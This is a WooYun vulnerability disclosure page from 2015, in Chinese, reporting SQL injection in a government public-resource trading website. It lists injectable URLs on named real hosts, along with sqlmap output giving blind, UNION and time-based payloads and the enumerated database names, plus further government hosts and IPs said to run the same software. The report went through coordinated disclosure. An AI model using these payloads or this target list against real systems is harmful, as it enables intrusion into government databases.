当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102168

漏洞标题:某政府在用系统通过SQL注入十几处打包

相关厂商:cncert

漏洞作者: 路人甲

提交时间:2015-03-18 18:50

修复时间:2015-06-17 09:50

公开时间:2015-06-17 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-19: 厂商已经确认,细节仅向厂商公开
2015-03-22: 细节向第三方安全合作伙伴开放
2015-05-13: 细节向核心白帽子及相关领域专家公开
2015-05-23: 细节向普通白帽子公开
2015-06-02: 细节向实习白帽子公开
2015-06-17: 细节向公众公开

简要描述:

所有sql注入打包提交,不刷

详细说明:

1.png


关键词从下面找
十几个注入点,几乎涵盖所有参数
http://www.asggzyjy.cn/search.jspx?q=1'
http://www.asggzyjy.cn/page/index.jspx?code=CMS_GUID_JSGC
http://www.asggzyjy.cn/news/cqjy/one/index.jspx?id=1'
http://www.asggzyjy.cn/news/jsgc/one/index.jspx?id=1'
http://www.asggzyjy.cn/news/news/one/index.jspx?id=7116'
http://www.asggzyjy.cn/news/notice/one/index.jspx?id=3980'
http://www.asggzyjy.cn/news/notice/page/index.jspx?code=1'
http://www.asggzyjy.cn/news/type/one/index.jspx?base=&counter=98060&id=1'
http://www.asggzyjy.cn/news/zfcg/one/index.jspx?id=1'
http://www.asggzyjy.cn/news/news/all/index.jspx?code=CMS_INTEGRITY_ZWDT
http://www.asggzyjy.cn/username_unique.jspx?username=1'
http://www.asggzyjy.cn/enterprisecode_unique.jspx?enterpriseCode=1'
http://www.asggzyjy.cn/enterprisename_unique.jspx?enterpriseName=1'
sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.asggzyjy.cn:80/search.jspx?q=1%' AND 8069=8069 AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://www.asggzyjy.cn:80/search.jspx?q=-5255%' UNION ALL SELECT 83,CHAR(113)+CHAR(116)+CHAR(104)+CHAR(102)+CHAR(113)+CHAR(105)+CHAR(78)+CHAR(66)+CHAR(86)+CHAR(110)+CHAR(108)+CHAR(113)+CHAR(117)+CHAR(103)+CHAR(107)+CHAR(113)+CHAR(99)+CHAR(100)+CHAR(116)+CHAR(113),83,83,83--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: http://www.asggzyjy.cn:80/search.jspx?q=1%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: http://www.asggzyjy.cn:80/search.jspx?q=1%' WAITFOR DELAY '0:0:5'--
available databases [52]:
[*] BBS
[*] EX_ISPS_Approval
[*] EX_ISPS_Assessment
[*] EX_ISPS_Complaint
[*] EX_ISPS_Country
[*] EX_ISPS_CPFUNDS
[*] EX_ISPS_GlobalInstance
[*] EX_ISPS_GovInfoOpens
[*] EX_ISPS_GovInvestment
[*] EX_ISPS_ImportantProject
[*] EX_ISPS_InfoManagement
[*] Ex_ISPS_LAND
[*] EX_ISPS_LEVY
[*] EX_ISPS_Medical
[*] EX_ISPS_mining
[*] EX_ISPS_Others
[*] EX_ISPS_PAYMENTS
[*] EX_ISPS_POVERTYALLEVIATION
[*] Ex_ISPS_project
[*] Ex_ISPS_property
[*] EX_ISPS_SOCIALFUNDS
[*] EX_ISPS_SpecialFunds
[*] Ex_ISPS_stock
[*] EX_ISPS_YiHaoTong
[*] finix_new
[*] Finix_WorkflowOA
[*] FinixOA
[*] master
[*] model
[*] msdb
[*] MsgSend
[*] MsgSMS
[*] MyLibrary
[*] NewEcGap
[*] noahdb_chanpin
[*] Noahdb_SX
[*] pubreout
[*] PubresNew
[*] PubresOutNew
[*] pubress
[*] ReportServer$SQLEXPRESS
[*] ReportServer$SQLEXPRESSTempDB
[*] ReportServerTempDB
[*] TDM_BASEDATA
[*] TDM_BusinessDb
[*] TDM_FlowDb
[*] TDM_HallSystem
[*] TDM_JYPY
[*] TDM_Portal
[*] TDM_StateFlow
[*] TDM_TradeTools
[*] tempdb

漏洞证明:

其他有效案例(以下绝对是同一套程序):
http://www.asggzyjy.cn/search.jspx?q=1
http://ggzy.llcftxw.gov.cn/search.jspx?q=1
http://ggzy.jzcfxxw.gov.cn:8080/search.jspx?q=1
http://124.166.243.132:8080/search.jspx?q=1
http://60.223.227.13:8080/search.jspx?q=1
http://now.quany.ga/search.jspx?q=1
http://222.133.32.11:21188/search.jspx?q=1
……

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-19 09:49

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无


漏洞评价:

评论